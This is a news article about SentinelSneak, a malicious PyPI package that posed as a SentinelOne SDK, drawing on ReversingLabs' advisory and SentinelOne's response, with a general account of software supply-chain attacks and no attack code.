Malicious Python Trojan Impersonates SentinelOne Security Client

A fully functional SentinelOne client is actually a Trojan horse that hides malicious code within; it was found lurking in the Python Package Index repository ecosystem.

In the latest supply chain attack, an unknown threat actor has created a malicious Python package that appears to be a software development kit (SDK) for a well-known security client from SentinelOne.
According to an advisory from cybersecurity firm ReversingLabs issued on Monday, the package, dubbed SentinelSneak, appears to be a fully functional SentinelOne client and is currently under development with frequent updates appearing on the Python Package Index (PyPI), the main repository for Python code.
SentinelSneak does not attempt malicious actions when it is installed, but it waits for its function to be called by another program, researchers noted. As such, the attack highlights attackers focus on the software supply chain as a way to inject compromised code into targeted systems as a beachhead for further attacks. So far, those further attacks have likely not happened, researchers said.
A cursory glance at the source of this package would have easily missed the malicious functionality injected in the otherwise legitimate SDK code, says Tomislav Pericin, chief software architect at ReversingLabs.
The attack also demonstrates a common way to attack the supply chain: Use a variant of typosquatting to create malicious packages that bear names similar to well-known open source components. Often called dependency confusion, the technique is an example of one used against the Node Package Manager (npm) ecosystem for JavaScript programs in an attack dubbed IconBurst,
according to research published in July
.
In another typosquatting attack, a threat group
uploaded at least 29 clones
of popular software packages to PyPI.
The SentinelOne imposter package is just the latest threat to leverage the PyPI repository and underscores the growing threat to software supply chains, as malicious actors use strategies like typosquatting to exploit developer confusion and push malicious code into development pipelines and legitimate applications, ReversingLabs
stated in its advisory
.
While code repositories of all kinds are under attack, overall, the
npm ecosystem
has suffered more malicious attention than the Python Package Index. In 2022, 1,493 malicious packages have been uploaded to PyPI, a drop of nearly 60% from the 3,685 malicious uploads detected by ReversingLabs in 2021, the company stated.
In the latest effort, the fake SentinelOne 1.2.1 package raises many red flags, the advisory stated. The suspicious behaviors include the execution of files, the creation of new processes, and communicating with external servers using their IP address rather than a domain name.
ReversingLabs stressed that the client has no connection to SentinelOne, besides using the security firms name. The PyPI package appears to be an SDK that helps simplify programmatic access to the client.
It could be that malicious actors are attempting to draft on SentinelOne’s strong brand recognition and reputation, leading PyPI users to believe that they have deployed SentinelOnes security solution, without taking the — necessary — step of becoming a SentinelOne customer, ReversingLabs stated in its advisory. This PyPI package is intended to serve as an SDK to abstract the access to SentinelOne’s APIs and make programmatic consumption of the APIs simpler.
In a statement to Dark Reading, SentinelOne reiterated that the package is fake: SentinelOne is not involved with the recent malicious Python package leveraging our name. Attackers will put any name on their campaigns that they think may help them deceive their intended targets, however this package is not affiliated with SentinelOne in any way. Our customers are secure, we have not seen any evidence of compromise due to this campaign, and PyPI has removed the package.
The attack also shows that developers are becoming an increasing target of attackers, who see them as a weak point in targeted companies defenses, as well as a potential way to infect those companies customers.
In September, for example, attackers used stolen credentials and a development Slack channel to
compromise game developer Rockstar Games
and gain access to sensitive data, including assets for the developers flagship Grand Theft Auto franchise.
For that reason, companies should help their developers understand which software components could pose a risk, Pericin says.
Developers should put new project dependencies under a higher degree of scrutiny before opting to install them, he says. Given that the malware only activates when used, not when installed, a developer might have even built a new app on top of this malicious SDK without noticing anything odd.
In the case of SentinelSneak, the threat actor behind the Trojan horse published five additional packages, using variations on the SentinelOne name. The variations appear to be tests and did not have a key file that encapsulated much of the malicious functionality.
ReversingLabs reported the incident to the PyPI security team on Dec. 15, the company said. SentinelOne was notified the next day.
Weve caught this malicious package very early, the company said. Theres no indication that anybody has yet been affected by this malware.
Story was updated to include a statement from SentinelOne.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Malicious Python Trojan Impersonates SentinelOne Security Client